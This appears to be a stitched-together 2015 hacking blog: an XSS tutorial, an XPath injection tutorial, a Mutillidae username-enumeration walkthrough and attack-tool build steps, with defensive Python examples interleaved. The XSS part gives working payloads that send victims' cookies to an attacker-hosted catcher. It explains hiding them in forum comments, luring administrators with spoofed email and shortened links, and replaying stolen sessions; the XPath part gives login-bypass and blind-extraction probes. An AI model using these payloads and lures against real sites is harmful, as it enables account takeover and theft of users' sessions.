Wednesday, 11 February 2015

HOW TO DO XSS ATTACK ON WEBSITE?


Hi. XSS comes in two forms: Persistent and Non-Persistent.

For XSS we will use something called a cookie catcher.
The question will be: why would we need someone else's cookie?
The answer is that we can change our browser's cookies to log in as them!!! So let's call it Session Hijacking.
First go to a free hosting site like http://www.110mb.com or another PHP hosting site and register there. Then download this cookie catcher and upload it.
Cookie Catcher:  http://www.4shared.com/file/B9qRsDxece/cookie_catcher.html

What does the cookie catcher do?

It grabs the user's:

    Cookies

    IP

    Referrer (the page the user came from to reach the link)

    Time and date

Get Vulnerable sites:


Ok, first we need sites that are vulnerable to XSS so it will work on them.
To test, we add a piece of code after the link.
I will use this site, which many of you have probably seen before.
site: click here . Now to test whether a site is vulnerable or not, you can add these codes:

code:

"><script>alert(document.cookie)</script>

code:

'><script>alert(document.cookie)</script>

code:

"><script>alert("test")</script>

code:

'><script>alert("test")</script>

code:

"><body bgcolor="FF000"></body>

code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>


Then if we see a JavaScript popup like this:

[Screenshot: XSS alert popup]

Or, if you used my tests and saw the page's background go black or a Google page open inside that site, it means it's vulnerable to XSS attacks.
In the end, if your site is http://www.example.com, the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies without raising any suspicion, completely stealthily.
Now assume we have a forum which has HTML enabled, or a site with a comment page which is vulnerable to XSS.
Ok, now let's go to this site: click here
Now test and see if the XSS vulnerability tests work on it.
They do!!! And you're getting one of the vulnerability's symptoms. So now let's try to grab its cookies. If there is a box to type into and submit, add this:

code

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box. It's also good to add something before the code, like: hey i got a problem logging in???
so they won't suspect you. Refresh the page, then go to the newly created page: in the same directory where you saved your cookie catcher .php, look for cookies.html, a new file that shows you the cookies. For example, if your cookie catcher link is:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html
Now visit cookies.html and you will see the session of that cookie!
PS: the site I used doesn't support cookies, so you can use: click here for a cookie-supporting one.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c="+document.cookie) </iframe>

Then post it in the forum or the comment box.
This will open an iframe in the page, which embeds another page inside that website. If you don't know about iframes, make a new HTML file on your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes better.

Of course the site needs to have cookies supported! A blank JavaScript result means you need to go to another site.
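The defender's side of the comment-box trick above, added here as an example (this is not code from the post or from any site it mentions): untrusted comment text is entity-encoded at output time so the stored payload is displayed instead of executed, and the session cookie is issued with the HttpOnly, Secure and SameSite attributes so that document.cookie cannot read it in the first place. The cookie name PHPSESSID and the host attacker.example in the constructed sample inputs are assumed placeholders.

```python
import html
from http import cookies

# Constructed sample inputs: the comment-box payloads quoted in the post
# (with a placeholder host) plus a harmless comment.
SAMPLE_COMMENTS = [
    "hey i got a problem logging in???",
    '<script>document.location="http://attacker.example/cc.php?c=" + document.cookie</script>',
    '<iframe frameborder=0 height=0 width=0 '
    'src=javascript:void(document.location="http://attacker.example/cc.php?c="+document.cookie)></iframe>',
    '"><script>alert(document.cookie)</script>',
]


def encode_for_html(value: str) -> str:
    """Entity-encode the five characters that can break out of HTML text or a
    quoted attribute: & < > " '. After this the browser renders the payload as
    literal text and never sees a <script> or <iframe> tag."""
    return html.escape(value, quote=True)


def render_comment(comment: str) -> str:
    """Render a stored comment in element-body context (the forum/comment-box
    case from the post). Encoding happens at output time, every time."""
    return '<p class="comment">' + encode_for_html(comment) + "</p>"


def render_search_box(query: str) -> str:
    """Render a reflected value inside a double-quoted attribute (the
    search.php case from the post). The leading "> in the payload becomes
    &quot;&gt; and cannot close the attribute."""
    return '<input type="text" name="search" value="' + encode_for_html(query) + '">'


def is_inert(encoded: str) -> bool:
    """True if the encoded text contains no character that could open a tag or
    terminate a quoted attribute."""
    return not any(ch in encoded for ch in "<>\"'")


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the session id with the attributes that blunt the
    attack in the post:
      HttpOnly - document.cookie cannot read it, so the exfil payload gets nothing
      Secure   - never sent over plain HTTP
      SameSite - not attached to cross-site requests (Lax keeps normal links working)
    """
    jar = cookies.SimpleCookie()
    jar["PHPSESSID"] = session_id          # cookie name is a placeholder
    morsel = jar["PHPSESSID"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    morsel["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        status = "inert" if is_inert(encode_for_html(c)) else "DANGEROUS"
        print(status, render_comment(c))
    print(session_cookie_header("0123456789abcdef"))  # placeholder session id
```

Encoding has to match the context (element body, attribute, URL, JavaScript string); html.escape covers the first two, which are the cases the post uses. HttpOnly does not stop XSS itself, it only removes the cookie from what an injected script can read, so the output encoding is the primary fix and the cookie flags are the backstop.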

Non-Persistent XSS:

Ok, in this method we will make the victim admin go to our link. First we pick an XSS-vulnerable site. For this method we need a search.php page which is vulnerable to XSS and has cookies set on that page. In the vulnerable search.php, in the textbox for the word to search for, type:

code:

<script>alert(document.cookie)</script>

and click the search button. If you see a JavaScript popup, it's vulnerable to a Non-Persistent XSS attack. Ok, now we will do something similar.
I will use this link for this method: click here
Now in front of the search.php?search= add this:

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's e-mail on that vulnerable website and send a fake mail from an online fake mailer like this one: 


http://tipstrickshack.blogspot.com/2012/09/how-to-spoof-email-addresses.html


Now in the body just say something fake like: Hey i found a huge bug in your website! and give him the shortened link of the search.php page with the code added in front of it. The TinyURL will mask it, and once he goes to the link you will see his cookies in your cookies.html, and he will just be redirected to the link in your cookie catcher. No matter what he does, even if he changes his password, you can still log in as him.

Session Hijacking:

Ok, now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies for that page. Now go to your cookies.html page and copy everything after "Cookie:" into an open Notepad window. The ; separates cookies from each other, so first copy the part before the ; .
Now go to that vulnerable website and clear the link. Instead add this:

Code:

Javascript:void(document.cookie="")

or, for example:

Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! You're logged in as administrator :)
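What makes the cookie replay above work is that the server treats the cookie value as the whole proof of identity and never ties it to anything that changes. Added example (not code from the post or from any framework): a minimal in-memory session store that issues ids only from a CSPRNG, expires idle sessions, lets an id be rotated, and drops every session of a user when their password changes, so a copied cookie stops working the moment the victim changes the password. Class and method names are this example's own.

```python
import secrets
import time
from typing import Dict, List, Optional


class SessionStore:
    """In-memory session store written for this example (not a framework's own).

    Against cookie replay, two properties matter:
    - session ids come only from secrets.token_urlsafe, so they cannot be guessed
      or assembled from a cookie's format;
    - each session records the user's password "generation"; change_password()
      bumps the generation and drops the user's sessions, so a stolen id dies
      with the old password.
    """

    def __init__(self, idle_timeout: float = 1800.0):
        self.idle_timeout = idle_timeout
        self._sessions: Dict[str, List] = {}    # sid -> [username, generation, last_seen]
        self._generation: Dict[str, int] = {}   # username -> int

    def login(self, username: str) -> str:
        """Issue a fresh session id after the password check has succeeded
        (the password check itself is outside this example)."""
        sid = secrets.token_urlsafe(32)
        gen = self._generation.setdefault(username, 0)
        self._sessions[sid] = [username, gen, time.monotonic()]
        return sid

    def rotate(self, sid: str) -> Optional[str]:
        """Swap the id for a new one (e.g. after login or a privilege change);
        the old id stops working immediately. None if sid was not valid."""
        rec = self._sessions.pop(sid, None)
        if rec is None:
            return None
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = rec
        return new_sid

    def user_for(self, sid: str, now: Optional[float] = None) -> Optional[str]:
        """Resolve a cookie value to a username, or None if the session is unknown,
        idle too long, or older than the user's last password change."""
        now = time.monotonic() if now is None else now
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        username, gen, last_seen = rec
        if now - last_seen > self.idle_timeout or gen != self._generation.get(username):
            self._sessions.pop(sid, None)
            return None
        rec[2] = now
        return username

    def change_password(self, username: str) -> int:
        """Call after the new password is stored: invalidate every existing
        session of that user and return how many were dropped."""
        self._generation[username] = self._generation.get(username, 0) + 1
        stale = [sid for sid, rec in self._sessions.items() if rec[0] == username]
        for sid in stale:
            del self._sessions[sid]
        return len(stale)

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore(idle_timeout=60)
    sid = store.login("admin")
    print("before password change:", store.user_for(sid))
    store.change_password("admin")
    print("after password change:", store.user_for(sid))
```

Rotating the id on login also defeats session fixation, and binding sessions to the password generation is cheap compared with scanning the store, because a session that predates the change is rejected at lookup time even if the eager cleanup missed it.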

XPATH INJECTION TUTORIAL




XPath is a language designed to operate on data described with XML. XPath injection allows an attacker to inject XPath elements into a query that uses this language. Possible goals are to bypass authentication or to access information in an unauthorized manner.

We will learn using a simple example. Download the code from here and put it in your local server directory (the code was created by SAR Group).

Sample XML document which we are going to use:

<Employees> 
<!-- Employees Database --> 
  <Employee ID="1"> 
    <FirstName>Johnny</FirstName> 
    <LastName>Bravo</LastName> 
    <UserName>jbravo</UserName> 
    <Password>test123</Password> 
    <Type>Admin</Type> 
  </Employee> 
  <Employee ID="2"> 
    <FirstName>Mark</FirstName> 
    <LastName>Brown</LastName> 
    <UserName>mbrown</UserName> 
    <Password>demopass</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="3"> 
    <FirstName>William</FirstName> 
    <LastName>Gates</LastName> 
    <UserName>wgates</UserName> 
    <Password>MSRocks!</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="4"> 
    <FirstName>Chris</FirstName> 
    <LastName>Dawes</LastName> 
    <UserName>cdawes</UserName> 
    <Password>letmein</Password> 
    <Type>User</Type> 
  </Employee> 
</Employees> 

Bypass Authentication:-


Browse to the login.php page; here we can see a simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if no username or password has been provided.
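The root cause is the same as in SQL injection: the credentials are concatenated into the query text. Added example (not the SAR Group code or the post's own): the vulnerable concatenation beside two fixes, an XPath 1.0 literal encoder that keeps a quote inside the literal, and a lookup that never builds a query string at all. Element names follow the XML document above (UserName, Password, Type) rather than the uname/passwd/account names in the quoted query; the function names are this example's own. The XML is embedded so it runs offline.

```python
import xml.etree.ElementTree as ET

# The Employees document from the tutorial, embedded so the example runs offline.
EMPLOYEES_XML = """<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName><LastName>Bravo</LastName>
    <UserName>jbravo</UserName><Password>test123</Password><Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName><LastName>Brown</LastName>
    <UserName>mbrown</UserName><Password>demopass</Password><Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName><LastName>Gates</LastName>
    <UserName>wgates</UserName><Password>MSRocks!</Password><Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName><LastName>Dawes</LastName>
    <UserName>cdawes</UserName><Password>letmein</Password><Type>User</Type>
  </Employee>
</Employees>"""


def build_login_xpath_unsafe(username: str, password: str) -> str:
    """The vulnerable pattern: credentials pasted straight into the query text.
    A single quote in the input ends the literal and the rest becomes XPath."""
    return ("string(//Employee[UserName/text()='" + username +
            "' and Password/text()='" + password + "']/Type/text())")


def xpath_literal(value: str) -> str:
    """Encode untrusted text as an XPath 1.0 string literal. XPath 1.0 has no
    escape character, so a value containing both quote kinds is assembled
    with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in value.split("'")) + ")"


def build_login_xpath_safe(username: str, password: str) -> str:
    """Same query, but every untrusted value goes through xpath_literal, so the
    quote in ' or '1' = '1 stays inside the literal instead of closing it."""
    return ("string(//Employee[UserName/text()=" + xpath_literal(username) +
            " and Password/text()=" + xpath_literal(password) + "]/Type/text())")


def authenticate(username: str, password: str):
    """Lookup with no query-string building at all: walk the parsed tree and
    compare values in Python. Returns the employee's Type, or None.
    (Plaintext passwords in the XML are the tutorial's; store hashes in practice.)"""
    root = ET.fromstring(EMPLOYEES_XML)
    for emp in root.findall("Employee"):
        if emp.findtext("UserName") == username and emp.findtext("Password") == password:
            return emp.findtext("Type")
    return None


if __name__ == "__main__":
    taut = "' or '1' = '1"
    print("unsafe:", build_login_xpath_unsafe(taut, taut))
    print("safe:  ", build_login_xpath_safe(taut, taut))
    print("login with tautology ->", authenticate(taut, taut))
    print("login jbravo/test123  ->", authenticate("jbravo", "test123"))
```

Where a full XPath engine is in use, the cleanest fix is variable binding rather than literal encoding, for instance lxml's xpath() accepts $-variables as keyword arguments so the user input never touches the query text; the literal encoder above is for engines that offer no parameter binding, and the tree walk shows that a login check over a small document does not need XPath at all.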


Blind Xpath Injection:-


If there is no knowledge of the XML data's internal details, and the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page and enter any number; when you provide a number it displays the FirstName for that ID.

Blind XPATH Injection
Enter ' or '1' = '1 in the search box, and you will get all FirstNames regardless of the ID (number).

Blind XPATH Injection
In blind XPath injection we have to supply specially crafted queries to the application: if the query is true we get a result, otherwise we get nothing. So far we don't know any parent or child node of the XML document.

Guessing Of Parent Node:-


Supply the following query to the application and observe the result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing happens; we don't get the FirstName of any user. This means the first letter of the parent node is not "a". Now supply the following query:

' or substring(name(parent::*[position()=1]),1,1)='E

Blind XPATH Injection
You get a result; this means the first letter of the parent node is "E".

To guess the second letter of the parent node, supply the following query:

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child nodes. Browse to the xpath.php page and enter the following query.

//Employee[position()=3]/child::node()[position()=4]/text()

get-child-node
You get output from the parent node Employee with ID 3 and the child node whose position is 2.

To get the whole document, use the following query.

//Employee

Blind Xpath injection
This is just the concept of how to retrieve data from an XML document using XPath injection. XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  • string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.
I used the recon-ng xpath bruteforcer for the XPath injection attack, and we get the back-end XML file.

xapth-bruteforcer
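Both the XSS test strings from the first tutorial and the blind XPath probes from this one leave a very recognisable trail in the web server's access log, and an automated bruteforcer leaves hundreds of them. Added example (not part of either tutorial, and not a real server's log): a small scanner that parses combined-format request lines, URL-decodes each query parameter, and tags the ones carrying those probe signatures. The three log lines are constructed; the signature names and regular expressions are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Patterns for the probe strings shown in the two tutorials above. They flag
# reconnaissance, not confirmed exploitation; tune them to the application.
SIGNATURES = {
    "xss_script_tag": re.compile(r"<\s*script\b", re.I),
    "xss_iframe": re.compile(r"<\s*iframe\b", re.I),
    "xss_cookie_read": re.compile(r"document\.cookie", re.I),
    "xss_js_uri": re.compile(r"javascript\s*:", re.I),
    "xpath_tautology": re.compile(r"['\"]\s*or\s*['\"]?1['\"]?\s*=\s*['\"]?1", re.I),
    "xpath_node_probe": re.compile(r"\b(substring|name|count|string-length)\s*\(", re.I),
    "xpath_axis": re.compile(r"\b(parent|child|ancestor|descendant)::", re.I),
}

# Combined log format (Apache/nginx); only the request line is needed here.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Constructed sample lines. Line 2 carries the reflected-XSS test string from
# the first tutorial, line 3 the blind-XPath parent-node probe from this one.
LOG_LINES = [
    '203.0.113.5 - - [11/Feb/2015:10:01:02 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Feb/2015:10:01:09 +0000] "GET /index.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Feb/2015:10:02:31 +0000] "GET /search.php?search=%27+or+substring(name(parent::*%5Bposition()%3D1%5D),1,1)%3D%27E HTTP/1.1" 200 433 "-" "curl/7.38"',
]


def scan_log_line(line: str):
    """Return a finding dict for a request whose query string matches a
    signature, or None. Each parameter is checked as decoded by parse_qsl and
    once more decoded, to catch double-encoded payloads."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates = (value, unquote_plus(value))
        matched = sorted(sig for sig, rx in SIGNATURES.items()
                         if any(rx.search(c) for c in candidates))
        if matched:
            hits.append((name, matched))
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path, "hits": hits}


def scan_log(lines):
    """Scan an iterable of log lines and keep only the findings."""
    return [f for f in map(scan_log_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding)
```

POST bodies (the login form case) are not in the access log, so for those the same signature check has to run in the application or a WAF; counting findings per source address over a time window is what turns a bruteforcer's stream of substring() probes into a single alert.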

Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:-  http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:-  https://github.com/orf/xcat

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Reads the saved Intruder results (one "username;true;false" line per row,
# with ";" as the delimiter) and prints the username column.

def main():
    with open('temp') as pass_file:
        for line in pass_file:
            user = line.strip().split(";")[0]
            print(user)

if __name__ == '__main__':
    main()

USERNAME ENUMERATION IN MUTILLIDAE USING BURPE INTRUDER.



Mutillidae is a free, open source, vulnerable web application providing a target for web security testers. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMPP.

Username Enumeration :- We have an application that reveals to us when a username exists on the system, which can be used in a further step such as brute-forcing the account.

On the Mutillidae login page, when you provide a valid username and an invalid password, the web application replies that the password is incorrect.

Username Enumeration


When we provide an invalid username, the application tells us that the account does not exist.

Username Enumeration Mutillidae

So by monitoring the web application's messages one can tell whether a username is valid or not.

First we examine the page's source code: when we provide a valid username the reply contains "var lAuthenticationAttemptResultFlag = 1", and when we provide an invalid username the reply contains "var lAuthenticationAttemptResultFlag = 0".

var lAuthenticationAttemptResultFlag = 1    means the username exists.

var lAuthenticationAttemptResultFlag = 0    means the username does not exist.



Alternatively we can do this by saving both pages' source code (valid username and invalid username) to text files and then using the diff command.

root@bt:~# diff login password
762c762
< var lAuthenticationAttemptResultFlag = 0;
---
> var lAuthenticationAttemptResultFlag = 1;

Now open Burp Suite, set up the proxy listener, try to sign in from the browser, and capture the request.

Burpe-Request

Now right-click on the request and click Send to Intruder.

For the position we choose only the username.

Burpe-Intruder

On the Payloads tab -> Payload Options -> load the sample username list.

Intruder-Payload

On the Options tab -> Grep - Match -> Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;

Intruder-Option

Click Intruder -> Start attack.

Now Burp makes requests to the login page, examines the responses, and classifies them according to the grep options we provided.

Intruder-Attack

Click Save -> Results table; under Delimiter choose Custom and enter ";", then select the columns we need (in this case I selected Payload, var lAuthenticationAttemptResultFlag = 1 and var lAuthenticationAttemptResultFlag = 0) and save it.

Intruder-Result

The saved file looks like the following.

Intruder-saved-file

In the file, the first column is the username; then true means the username exists and false means the username is invalid. So now we only need the entries whose second column is true.

Possible-Username

So I saved these values in another temp file, from which you can extract the usernames using the delimiter. I used a simple Python script for this purpose.

Username List
Finally we have a list of usernames which exist on the system.

Username List


admin
adrian
john
jeremy
bryce
samurai
jim
bobby
simba
dreveil
scotty
ca
john
kevin
dave
patches
rocky
ed
acc
access
access
accesspoint
account
account
accountant
accounting
accounting
accounts
ace
activedirectory
active-directory
ad
ad
adabas
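The whole Intruder run above works only because the login handler answers differently for an unknown account and for a wrong password. Added example (not Mutillidae's code, and the user table is constructed): the verbose handler modelled on what the post observes, the uniform handler that fixes it, and a self-check that does what the diff/grep step does, sending one existing and one impossible username with a wrong password and reporting whether the responses differ. Function names, the flag field and the sample passwords are this example's own.

```python
import hashlib
import hmac


def _digest(password: str) -> str:
    # sha256 stands in for a real password hash (use bcrypt/argon2 in production);
    # what matters here is that both handlers do identical work for known and
    # unknown users.
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user table: names echo the list above, passwords are made up.
USERS = {"admin": _digest("adminpass"), "adrian": _digest("somepassword")}
DUMMY_DIGEST = _digest("no-such-user-placeholder")


def login_verbose(username: str, password: str) -> dict:
    """The behaviour the post observes in Mutillidae: a different message and a
    different lAuthenticationAttemptResultFlag depending on whether the account
    exists, so the response itself answers "is this a valid username?"."""
    if username not in USERS:
        return {"flag": 0, "message": "Account does not exist"}
    if not hmac.compare_digest(USERS[username], _digest(password)):
        return {"flag": 1, "message": "Password incorrect"}
    return {"flag": 1, "message": "Logged in"}


def login_uniform(username: str, password: str) -> dict:
    """Hardened form: one message and one flag for every failure, and the hash
    comparison runs even for unknown users so timing does not leak either."""
    stored = USERS.get(username, DUMMY_DIGEST)
    ok = hmac.compare_digest(stored, _digest(password)) and username in USERS
    if ok:
        return {"flag": 1, "message": "Logged in"}
    return {"flag": 0, "message": "Invalid username or password"}


def enumeration_oracle(handler, known_user: str = "admin",
                       probe_user: str = "zz-no-such-user") -> bool:
    """Self-check equivalent to the diff of the two saved pages in the post:
    one username that exists and one that cannot, both with a wrong password.
    True means the responses differ, i.e. the login leaks account existence."""
    return handler(known_user, "wrong-password") != handler(probe_user, "wrong-password")


if __name__ == "__main__":
    print("verbose handler leaks:", enumeration_oracle(login_verbose))
    print("uniform handler leaks:", enumeration_oracle(login_uniform))
```

The same check belongs on password-reset and registration forms, which leak existence just as often, and the uniform message should be paired with per-account and per-source rate limiting so that the follow-on brute force the post mentions is slow as well as blind.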

Building the pth-suite / Post Install


Our first blog entry will discuss the process to build your very own .deb packages for Backtrack R2.

As of right now the build process is centered around Backtrack as the primary attack platform.  However, I've already received a request for assistance in building packages for RedHat / CentOS based distributions.  I will probably also modify the build process to do tarballs as well, as that might be better for some folks.

By default, all my scripts create the .deb packages to install into /opt/pth.  This way they don't overwrite or otherwise conflict with existing packages.  Also, most of the compiled binaries will automatically look in /opt/pth for their required libraries, which makes life easier.

1)  As root, you can check out the items from Google Code by doing the following:
2)  Change directories into the build directory and install the precompilation dependencies.  I tested the scripts from a freshly installed version of Backtrack 5R2.  Hopefully none of the dependencies fail.
# cd pth-suite/build
# sh all-deps.sh


3)  Execute the script for the utility that you want to build.  In this case we'll go with building Samba 4 and Openchange.  Since Openchange versioning is so closely tied to a particular version of Samba 4, we take advantage of the Openchange Samba 4 build script to ensure that Samba is built the way Openchange wants.  Because of this, this particular build script builds both Samba and then Openchange.  The first step in the build process is to download the source for Openchange and Samba.  From there the script will build everything.  Final packages will be in the packages subdirectory.
# ./build-samba4-openchange.sh
5)  Repeat the build process for each of the utilities you want to install.  Keep in mind that during their build process they are installed into /opt/pth and then removed as part of creating a package.  Therefore, /opt/pth should not initially exist.  Note the packages will take a while to compile.  Most notably, Firefox might take a couple of hours depending on your CPU.  You've been warned.

6)  After all the packages have been compiled, you can install the .deb packages using dpkg.
# dpkg -i packages/*.deb

7)  After the installation, you will need to create a file in /etc/ld.so.conf.d to reference the library path /opt/pth/lib.  This is done by:

# echo /opt/pth/lib > /etc/ld.so.conf.d/pth.conf
# ldconfig
8)  Add /opt/pth/bin to your PATH either manually or by editing ~/.bashrc.
# export PATH=/opt/pth/bin:$PATH

or

# echo 'export PATH=/opt/pth/bin:$PATH' >> ~/.bashrc
# . ~/.bashrc

(Single quotes keep $PATH unexpanded until the shell reads ~/.bashrc, and >> appends instead of overwriting the file.)

 9)  Have Fun!